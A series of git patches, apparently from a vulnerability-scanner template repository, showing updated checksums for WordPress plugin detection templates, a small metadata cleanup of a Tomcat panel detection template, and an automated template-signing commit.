+http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:683735ec9e0a71b7316eba44eebdcf948e36b7ae -http/technologies/wordpress/plugins/siteorigin-panels.yaml:70d84f0aa8181d8fe7e1b3cfabff5c11d0053bf6 -http/technologies/wordpress/plugins/smart-slider-3.yaml:152e995d77855dca677b708076568d8d33bc4214 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:169f9a890ccec0e6724ef21c0ec1fc46b0d1f1c8 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:05f24d893d16a6da8d7adf8f632cc42c6b8037cc -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:c7f4ae61eaba574db1a02efdca46d0b4ef65f36b -http/technologies/wordpress/plugins/sucuri-scanner.yaml:319e39749e03bbda34fc55e1c5568dfb3d685637 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:de80c7e7e30522e92252bfcb554b774266ff8e07 -http/technologies/wordpress/plugins/tablepress.yaml:298ba6841daf785708bdfbc6a440b275ed1525ec -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:012f163ff24eb301fb02549f2d3294e10969d63c -http/technologies/wordpress/plugins/templately.yaml:0f27f8c72ee15b2a964d1bfa8f353d3a821746d1 -http/technologies/wordpress/plugins/the-events-calendar.yaml:8f9e90453856bd32b41e4f436024559581b4e9f7 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:cddb817075e67dde5e8b6f03e0d3e25e5e20186c -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a21029db7bbe67ad7a80da36922f11f7ddbef08e -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:1dba72949dc1fcf43574e7a2a8c22b1e6f28422d -http/technologies/wordpress/plugins/under-construction-page.yaml:a1d2d60f80770f8e354f7f48757c25c21f84b82a +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:d4af07d3c0bb5bdefb7da78c149f381e5b3a4837 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:1e7c4990a7000ccf0bc238e92b3ae32ab63dcbcb +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:98033211cf6560ee35c6baeeaa9f3e674a7e12e2 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:7e572171b269448e711c7a3c650605fabe895430 -http/technologies/wordpress/plugins/webp-express.yaml:4e7dc51f2f6a8fb4525a39dc1cd0a3ffa0ef7333 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:aeae28a77d0d921d2a0eef9f8785c853d17b0cd0 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d0bb68053734e30e68ef51861bcf4b85613b1d75 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:3f573cb869fb297b4de255da6d31d56bddd7a738 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:71acfc857a12d01acd22ae898c97f9ffb1789a72 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:58d9f59e05e6596acc1cf05d45ec13e4b237c373 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:90067117309042297bdcec3c6320ad1ee9fe789a -http/technologies/wordpress/plugins/woocommerce-payments.yaml:89b8df052c3b7072463571be75177cecbf3dcdba -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:1bd5852cf7944bf7c1d6cea04442177d558c3ccd -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:78ed9faf3748e089154fe7f28e21b986c418efad -http/technologies/wordpress/plugins/woocommerce-services.yaml:d9ac95c11b0610acca7bb38a8c703143193f2bc2 -http/technologies/wordpress/plugins/woocommerce.yaml:4824ca71fbd1b7d9e1ce07646cd2fc36fa3ba19c -http/technologies/wordpress/plugins/wordfence.yaml:08bfdcb49e66e5c2229f1456f2cd1f3248fa7d21 -http/technologies/wordpress/plugins/wordpress-importer.yaml:3752870c70967cc9904cddb2f9a940a261895cda -http/technologies/wordpress/plugins/wordpress-seo.yaml:9322789c80f5ba317a826dd6e87602991232dd94 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:9c906ca14926936e06890257a74597d850e349a0 -http/technologies/wordpress/plugins/wp-crontrol.yaml:7f743706465219d90ff958d0686a23b51ec1aaa6 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:78560927e48df7f729de95460190c71b82e7c9d5 -http/technologies/wordpress/plugins/wp-file-manager.yaml:20810a1b80b2f2ee8aa7a264bdf7761582af5ea9 -http/technologies/wordpress/plugins/wp-google-maps.yaml:294f1052f902b0f93a6cbed1e7e3a411f0f3bc49 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:925a3942a85e02b5439c7c588c7207b04225e1b9 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:e21b4c8d88640528f665343eb0b43fc64df616e3 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:87236dd3689ff7625ca9a192a18d68efda54a191 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:bde2088b2f9d98b08251a21f74dcf983ddf05a51 -http/technologies/wordpress/plugins/wp-optimize.yaml:d4a352e5c39facd6b66ed46de7e97e7965edecc7 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:ec1253c722ad3a2b746a59aa03f472c985b0ff6b -http/technologies/wordpress/plugins/wp-reset.yaml:4fdb40e43e378f36165e746c9af79ae68d7d3978 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:7cee604af66dbc8904baf56424b74b39d7e23583 -http/technologies/wordpress/plugins/wp-rollback.yaml:8707ce8224bb4c20617712d4d3252dccae5c8aa3 -http/technologies/wordpress/plugins/wp-seopress.yaml:e8147b3da837d966c9cd3f864325a5638f3e55d3 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:39e20d7bc1926c1f639518e315cdef35f454ba3d -http/technologies/wordpress/plugins/wp-smushit.yaml:9116ee113f83112181435dac9317f1a764a2508b -http/technologies/wordpress/plugins/wp-statistics.yaml:408a25788027828aef4dbbc6cadd74228ab999c2 -http/technologies/wordpress/plugins/wp-super-cache.yaml:88c665c495ac5724c5ef2427f84e027a60149723 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:8a5840db0a8156898e494fad45f70d373ec6eaac -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:44ee0c34ea8320ec5f9b6b0ac317db29e9f8fec7 -http/technologies/wordpress/plugins/wpforms-lite.yaml:47c761b5b1b13410f6c8a2d1bb8771568bf6632d -http/technologies/wordpress/plugins/wps-hide-login.yaml:9986b205732013f2ec638379ee92c3fa231cbc18 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f69a3bec62d70c38fe4f30df112760fb13e301d0 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1bfaedcfecd5f5a14bf6b90214289f145799d041 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8901,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:460d4f810e9197418a00e93243222b3920562b96 +templates-checksum.txt:a45ab7aead126b324aecfb4cee761bcf6012b683 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c26eaa023f2ceaabdb60c73155c8f599ae1f52b2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 20 Jul 2024 11:29:19 +0530 Subject: [PATCH 1460/1841] Update tomcat-exposed.yaml --- http/exposed-panels/tomcat/tomcat-exposed.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/tomcat/tomcat-exposed.yaml b/http/exposed-panels/tomcat/tomcat-exposed.yaml index ad06b0d670..08a1c0840b 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed.yaml @@ -1,10 +1,10 @@ id: tomcat-exposed info: - name: Tomcat exposed - Detect + name: Tomcat Exposed - Detect author: Podalirius,righettod - description: Tomcat instance was detected. severity: info + description: An Apache Tomcat instance was detected. classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: @@ -21,7 +21,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: version,tomcat,docs,panel,apache + tags: tomcat,panel,apache,detect http: - method: GET @@ -33,7 +33,6 @@ http: - '{{BaseURL}}/examples/' stop-at-first-match: true - matchers: - type: dsl dsl: From 4cae51905ea37c060e3fd5fd49efc61ec6dc72d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Jul 2024 05:59:18 +0000 Subject: [PATCH 1461/1841] Auto Template Signing [Sat Jul 20 05:59:18 UTC 2024] :robot: --- http/exposed-panels/f5-admin-interface.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + 